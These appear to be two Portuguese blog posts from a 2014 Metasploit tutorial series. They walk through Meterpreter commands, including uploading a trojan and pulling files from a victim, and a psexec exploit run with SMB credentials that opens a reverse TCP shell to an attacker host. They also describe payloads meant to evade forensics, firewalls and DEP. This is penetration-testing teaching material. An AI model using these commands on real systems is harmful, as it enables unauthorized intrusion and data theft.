– root@injetionsec:~#

Comandos do metasploit – part 3

26.09.2014 (9:55 pm) – Filed under: Pentest ::

Veja :

comandos do metasploit – parte 1
comandos do metasploit – parte 2

Vamos falar um pouco do meterpreter galera,

Meterpreter : o meterpreter e um payload avançado,como ja falamos um injeção em DDL,se comunica atraves de sockets,com API em ruby e como ele funciona,vejamos

– Carrega a DLL com a carga do payload e injetando na DLL
– O nucleo do meterpreter estabelece uma conexão enviando assim um GET , e assim o metasploit recebe o GET e configura o cliente
– por ultimo os payloads do meterpreter carrga os modulos proporcinando assim acesso adminisrativos

– O meterpreter resite na memoria não escrevendo nada em disco
– Não e criado um novo processo com o meterpreter ele injeta um processo comprometido e pode migragar para outros processo que estão em execução com maior facilidade
– Utiliza comunicação cifrada
– Praticas forences convencionais são dificeis de ver os rastros
– Meterpreter utiliza um sistema de comunicações canalizado
– Todos esses processos são transparentes e completam isso tudo em 1 segundo.

vejamos alguns comandos do meterpreter

– help : e um comando que mostra um menu de ajuda do meterpreter

meterpreter > help

– backtround : esde comando envia a sessão atual do meterpreter para segundo plano,para voltar para sessão atual simplesmente digite o seguinte comando “sessions -i 1”

– ps : este comando mostras os processos que esta sendo executado na maquina alvo

meterpreter > ps

– migrate : com esse comando podemos migra para outro processo da vitima

meterpreter > run post/windows/manage/migrate

– ls : lista o diretorio que estamos

meterpreter > ls

– download : pode fazer um download de qualquer arquivo (utilize \\)

meterpreter > download c:\\boot.ini

– upload : podemos fazer um upload de por exemplo um arquivo qualquer ou arquivo malicioso (utilize \\)

meterpreter > upload evil_trojan.exe c:\\windows\\system32

– ifconfig : esse comando mostra as configurações da interface de rede

meterpreter > ifconfig

– getuid : este comando mostra o usuario ue esta sendo executado naquele determinado host

meterpreter > getuid

– execute : esse comando executa um determinado comando

meterpreter > execute -f cmd.exe -i -H

– shell : este comando apresenta o shell do sistema

meterpreter > shell

– idletime : esse comando mostra quanto tempo a maquina esta ativada

meterpreter > idletime

Bem galera esse foram alguns dos comando básico do meterpreter , ate o próximo tópico =)

Comandos do metasploit – part 2

26.09.2014 (1:52 pm) – Filed under: Pentest ::

Veja : comandos do metasploit – parte 1

continuando a nossa série de post sobre alguns comando do metasploit galera =D

setg & unsetg: podemos configurar as variaveis globais dentro do metasploit com o seguinte comando “setg” uma vez estabelecido podemos utiliza-lo para muitos exploits e modulos auxiliares que quisermos,podemos tambem guarda-los para ser usado na proxima vez que usarmos o framework,caso não queira mais guardar essas configurações você pode utilizar o “unsetg” para assim eliminar as variaveis globais, um exemplo seria assim:
msf > setg LHOST 192.168.3.104
LHOST => 192.168.3.104
msf > setg RHOSTS 192.168.3.0/24
RHOSTS => 192.168.3.0/24
msf > setg RHOST 192.168.3.143
RHOST => 192.168.3.43

Depois de guardas as configurações dessas variaveis podemos executar o seguinte comando save para salvar as configurações atuais, com essas ajustes podemos carregar automaticamente assim evitando de você ter que digitar toda hora os comandos para “setar” as configurações

msf > save
Saved configuration to: /root/.msf3/config

EXPLOIT ATIVO

Logo apos o exploit esta ativo na alvo,temos que obter um shell reverso,tomamos como  exemplo:

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.3.107
RHOST => 192.168.3.107
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.3.109
LHOST => 192.168.3.109
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER teste
SMBUSER => teste
msf exploit(psexec) > set SMBPASS password
SMBPASS => password
msf exploit(psexec) > exploit
(….)
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.3.19:4444 -> 192.168.3.107:1073)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

background & sessions: Usando o comando backtround colocamos a sessão atual em segundo plano para voltar para sessão usando o seguinte comando “sessions -l” isso vai nos trazer de volta para o console Metasploit sem terminar a sessão,podemos também interagir com o metasploit iniciando uma nova sessão com o seguinte comando “sessions -i 1” iniciando assim uma sessão no Metasploit.

Payloads: podemos encontrar 3 diferentes tipos de payloads no metasploit: singles,stagers,stages; esses tipos permitem uma grande variedade que pode ser uteis.

* singles – são payloads que são automatos e independentes,pode ser algo simples como adicionar um usuario no sistema e assim executar serviços

* Stagers – configuração de um conexeção entre o atacante e a vitima

Vejamos alguns tipos de payloads disponíveis no metasploit:

* Inline: e um simples payload que contem um exploit com um codigo de shell completo para ser selecionado,são mais estaveis em algum quesitos.

* Staged : trabalham em conjunto com o payload realizando o trabalho mais especifico,exemplo um serviço estabelece um canal de comunicação entre o atacante e a vitima ele le uma carga e assim ejecuta a etapa no host remoto

* Meterpreter : ou meta-interprete opera atravez de injeção nas bibliotecas DLL,reside por completo na memoria da maquina,muito dificil de ser detectada com as tecnicas forences convencionais, os comandos e os plugins carregados dinamicamente estão em constante evolução

* PassiveX : e um payload que pode ajudar a baypassar as restrições dos firewall, mediante ao uso de ActiveX para criar instancias ocultas nos navegadores,usando assim um novo para se comunicar com atacaten através de solicitações e respostas em HTTP

* NoNX : o NX(não executa)e uma caracteristica integrada em algumas CPUs para evitar que algum codigo carrega em certas areas de memoria, em windows o NX e implementado como DEP (data execution prevention) esses pauloads do metasploit NoNX estão destinados a baypass o DEP

— Gerando payload: durante o processo de exploit e mais seguro caso seja necessario gerar um codigo em shell para utilizar na exploração, o metasploit pode gerar com o seguinte comando “generate”

msf > use payload/windows/shell/bind_tcp
msf payload(bind_tcp) > help

Para gerar um codigo sem nenhuma opção fazermos da seguinte forma:

msf payload(bind_tcp) > generate

fico por aqui galera ate o próximo post *.*